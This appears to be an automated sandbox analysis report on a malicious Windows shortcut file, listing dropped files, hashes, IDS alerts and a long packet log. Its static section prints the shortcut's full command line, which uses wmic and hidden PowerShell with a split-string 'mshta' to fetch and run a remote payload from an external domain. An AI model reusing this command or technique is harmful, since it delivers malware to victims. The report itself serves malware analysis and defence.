C:\Users\user\AppData\Roaming\qJXhXwR.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1083904
Entropy (8bit):	6.306477737442545
Encrypted:	false
SSDEEP:	24576:ErORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaA15:E2EYTb8atv1orq+pEiSDTj1VyvBay
MD5:	2B5ED481EEE9DE59066B4859C2BD354A
SHA1:	78BC58D581DFAA07B015DEBF9F27D2581B32736B
SHA-256:	23F87A03C5592907A4185CA344957E49485D78904A1665CB5B73C91AB072CD7E
SHA-512:	A5772937082F3F45BA7517A38FAD7C0C68BFC405D4C25522866222EDFE4565DD3A90FA41F9AA68BC58A504F4FF08A228DF98A43B895CC745D26D91389B8402A6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 35%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..PG."(..PG.+PF..RG..9I.{PG..9D.PG..9..PG.+P.PG..9E.PG.Rich+PG.........................PE..d.....lg.........."......4...R.......T.........@..........................................`...@...............@..............................\..\|........A...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...\|..............@....pdata..Ho...@...p..................@..@.rsrc....A.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\ConDrv

Download File

Process:	C:\Windows\System32\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.095703110114614
Encrypted:	false
SSDEEP:	3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglR2oO6JQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egyodeAc
MD5:	F7BD1022C29D3557B7F473259B64C68F
SHA1:	E31F3A3944CE634A2206D36D7697A8D8ACF07EDD
SHA-256:	DA218F2D2F1B39D996D876B6093A902E9CB8F4F92DDD4D4CC1F64D55DA2DFDC6
SHA-512:	8FC5A197831D75D59249AA0245FBE7EC37FC379A0BB5235FFB8B3E316FCA5CA9FAED806531FCA37336FBDEB782ABF684960E1DAFD5F8D1594273B1EC9CF5F2EF
Malicious:	false
Preview:	Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7488;...ReturnValue = 0;..};....

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
Entropy (8bit):	2.6374139349325727
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	tzA45NGAW4.lnk
File size:	1'916 bytes
MD5:	1fa8842a7e4debf7bf9e6c03773aa49c
SHA1:	cf2e60beff20f46a633020cf3a32e3cb6bf2eaae
SHA256:	34dd7e196ad94c9a7cf1858a0c7b8147bec90f9eb4b5179b37de9629fa24ce32
SHA512:	524361d968fb6330f64fc07a689c2932c0074c3f9856b9f2b9e1ad7ffc6eec355de4228dfc96ca2833e4f6819cc913f7f7dce67db10eee15caaa2dc9e1d02358
SSDEEP:	24:8AyH/BUlgKN4e9+/3qkWNdk6Zoc6/qdd79dsrabqyI+pu:89uGeKqldkU6idJ9Aaey3w
TLSH:	2A415E181AE90B20F3B7CE72547AB321997F7C49DD728F1D018186892537620F475F6B
File Content Preview:	L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

File Icon


Icon Hash:	72d282828e8d8dd5

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\..\Windows\System32\Wbem\wmic.exe
Command Line Argument:	process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')"
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T09:35:21.639605+0100	2026434	ET MALWARE VBScript Redirect Style Exe File Download	1	147.45.49.155	443	192.168.2.9	49707	TCP
2024-12-28T09:35:29.367884+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49713	147.45.49.155	443	TCP
2024-12-28T09:35:37.900856+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	1	192.168.2.9	49722	147.45.49.155	443	TCP
2024-12-28T09:35:38.145177+0100	1810003	Joe Security ANOMALY Windows PowerShell HTTP PE File Download	2	147.45.49.155	443	192.168.2.9	49722	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:35:19.010442019 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:19.010483027 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:19.010832071 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:19.096580982 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:19.096605062 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:20.615362883 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:20.615458012 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:20.714910030 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:20.714940071 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:20.715347052 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:20.715508938 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:20.717778921 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:20.763329983 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.222997904 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.226918936 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.414695024 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.414711952 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.414741993 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.414788008 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.414829969 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.414850950 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.414880991 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.458458900 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.458492994 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.458591938 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.458625078 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.458890915 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.606511116 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.606537104 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.606596947 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.606635094 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.606652975 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.606677055 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.639647007 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.639672041 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.639735937 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.639763117 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.639811039 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.666270971 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.666297913 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.666354895 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.666378975 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.666398048 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.666421890 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.692888021 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.692910910 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.692970991 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.692985058 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.693033934 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.798579931 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.798609018 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.798660040 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.798695087 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.798712015 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.798739910 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.818304062 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.818322897 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.818383932 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.818394899 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.818435907 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.831887007 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.831907034 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.831959963 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.831969976 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.832001925 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.832011938 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.843606949 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.843628883 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.843683958 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.843694925 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.843708992 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.843734026 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.857201099 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.857220888 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.857263088 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.857273102 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.857311010 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.857311010 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.907507896 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.907536983 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.907602072 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.907624006 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.907666922 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.959415913 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.959444046 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.959490061 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.959507942 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.959527016 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.959551096 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.995757103 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.995788097 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.995870113 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.995913982 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:21.995939016 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:21.995959044 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.004978895 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.005002975 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.005033970 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.005063057 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.005078077 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.005119085 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.015492916 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.015511990 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.015579939 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.015592098 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.015630960 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.026029110 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.026048899 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.026093006 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.026103973 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.026134014 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.026145935 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.035399914 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.035422087 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.035478115 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.035489082 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.035527945 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.044994116 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.045020103 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.045083046 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.045111895 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.045156002 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.053361893 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.053385973 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.053443909 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.053477049 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.053514004 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.147389889 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.147418976 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.147470951 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.147505045 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.147526026 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.147551060 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.183656931 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.183684111 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.183763027 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.183805943 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.183854103 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.189889908 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.189908981 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.189979076 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.190023899 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.190072060 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.196466923 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.196486950 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.196552038 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.196577072 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.196628094 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.196651936 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.202188969 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.202208996 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.202265978 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.202277899 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.202322006 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.208843946 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.208863974 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.208941936 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.208978891 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.209055901 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.214777946 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.214818001 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.214854956 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.214869022 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:22.214905977 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.214917898 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.215178013 CET	49707	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:22.215202093 CET	443	49707	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:23.724850893 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:23.724898100 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:23.729118109 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:23.736556053 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:23.736576080 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:25.290359974 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:25.290448904 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:25.292267084 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:25.292282104 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:25.292649031 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:25.299715996 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:25.347330093 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:25.925616980 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:25.976573944 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.126867056 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.126883030 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.126914024 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.126930952 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.126936913 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.126955032 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.126972914 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.126987934 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.126996994 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.127017975 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.181324959 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.181339025 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.181370974 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.181410074 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.181432009 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.181454897 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.181476116 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.328088999 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.328114986 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.328180075 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.328205109 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.328250885 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.356623888 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.356643915 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.356703043 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.356717110 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.356765032 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.385914087 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.385941982 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.386002064 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.386023998 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.386049986 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.386071920 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.523720980 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.523744106 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.523799896 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.523813009 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.523855925 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.523875952 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.546344995 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.546363115 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.546411037 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.546418905 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.546446085 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.546466112 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.564953089 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.564971924 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.565042973 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.565058947 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.565134048 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.580121994 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.580138922 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.580223083 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.580255985 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.580282927 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.580310106 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.594198942 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.594218016 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.594274998 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.594285011 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.594322920 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.630274057 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.630290985 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.630352974 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.630369902 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.630412102 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.731590033 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.731615067 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.731674910 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.731689930 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.731741905 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.743242025 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.743264914 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.743323088 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.743334055 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.743346930 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.743535042 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.754801035 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.754822969 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.754878998 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.754889011 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.754929066 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.764877081 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.764897108 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.764952898 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.764981985 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.765000105 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.765042067 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.776554108 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.776570082 CET	443	49710	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:26.776638985 CET	49710	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:26.776649952 CET	443	49710	147.45.49.155	192.168.2.9
